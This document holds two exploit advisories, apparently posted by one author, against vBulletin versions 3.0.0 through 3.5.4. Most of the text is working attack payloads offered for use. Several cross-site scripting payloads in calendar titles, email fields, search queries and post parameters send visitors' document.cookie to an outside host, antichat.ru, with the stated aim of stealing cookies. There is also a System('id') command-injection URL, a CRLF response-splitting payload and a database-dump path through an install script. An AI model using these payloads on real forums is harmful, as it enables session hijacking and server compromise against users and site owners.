# Title: vBulletin Version 3.5.2 - Introduction XSS scripting # Author: Discovered by ROOT_EGY # Version: vBulletin Version 3.5.2 =============================================== WWW.sec-war.com =============================================== 3.5.2 - Introduction XSS scripting The vulnerability is in the field «title» scenario «calendar.php». Example: TITLE :---> Test <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document.cookie; </ script> BODY :----> No matter OTHER OPTIONS: -> No matter That all went off to go to the calendar, create a new event in the header to prescribe <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document. cookie; </ script>, then go look at the link, which is our event and give to the show to someone who want to steal a cookie. 3.5.3 - Introduction XSS scripts in the field «Email Address» in the module «Edit Email & Password». Example: www.server.som/forumpath/profile.php?do=editpassword pass: your pass email: vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ document.cookie; </ script> . nomatt Note About lenght limitation **** forum / profile.php? do = editoptions Receive Email from Other Members = yes **** www.server.com/forumpath/sendmessage.php?do=mailmember&u = (your id) In the email write vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ Document.cookie; </ script>. nomatt. Once preserved, it is important to make the option email visible to all. Then the helmet someone www.xhh777hhh.som/forumpath/sendmessage.php?do=mailmember&u = (your id) and get a cookie on our address sniffer. 3.5.4 - Dump database The vulnerability is in the scripts directory upgrade_301.php 'install'. Example: server.com/forumpath/install/upgrade_301.php?step=SomeWord 3.5.4 - Introduction XSS scripting The vulnerability is in the url parameter scenario inlinemod.php. Example: www.server.com/forumpath/inlinemod.php?do=clearthread&url=lala2% 0d% 0aContent-Length:% 2033% 0d% 0a% 0d% 0a <html> Hacked! </ Html>% 0d% 0a% 0d% 0a =============================================== ROOT_EGY to connect: r0t@hotmail.es =============================================== Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends. ===============================================
# Title: vBulletin 3.0.0 XSS # Author: Discovered by ROOT_EGY # Version: vBulletin Version 3.0.0 =============================================== WWW.sec-war.com =============================================== 3.0.0 - Introduction XSS scripts in the script search.php. In fact, a hole through a browser implemented. Example: www.xhh777hhh.som/forumpath//search.php?do=process&showposts=0&query = <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s. jpg? »+ document.cookie; </ script> 3.0-3.0.4 - implementation of commands in the script forumdisplay.php through incorrect handling of variables. For example: www.xhh777hhh.som/forumpath/forumdisplay.php?GLOBALS [] = 1 & f = 2 & comma = ». System ( 'id').» 3.0.3-3.0.9 introduction XSS scripts in the Status field. Way to change the status can only admins, for example, moderators. Is an example code sployta: <body onLoad=img = new Image(); img.src = «http://antichat.ru/cgi-bin/s.jpg?»+document.cookie;> 3.0.9 and 3.5.4 - introduction XSS scripts in parameter posthash scenario newthread.php. Here primerchik: www.site.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s = & f = 3 & do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime = '% 2Bimg = new Image (); img. src = «http://antichat.ru/cgi-bin/s.jpg?» + document.cookie;% 2B '& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl = 1 & disablesmilies = 1 & emailupdate = 3 & postpoll = yes & polloptions = 1234 & openclose = 1 & stickunstick = 1 & iconid = 0 =============================================== ROOT_EGY to connect: r0t@hotmail.es =============================================== Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends. ===============================================
0 条评论。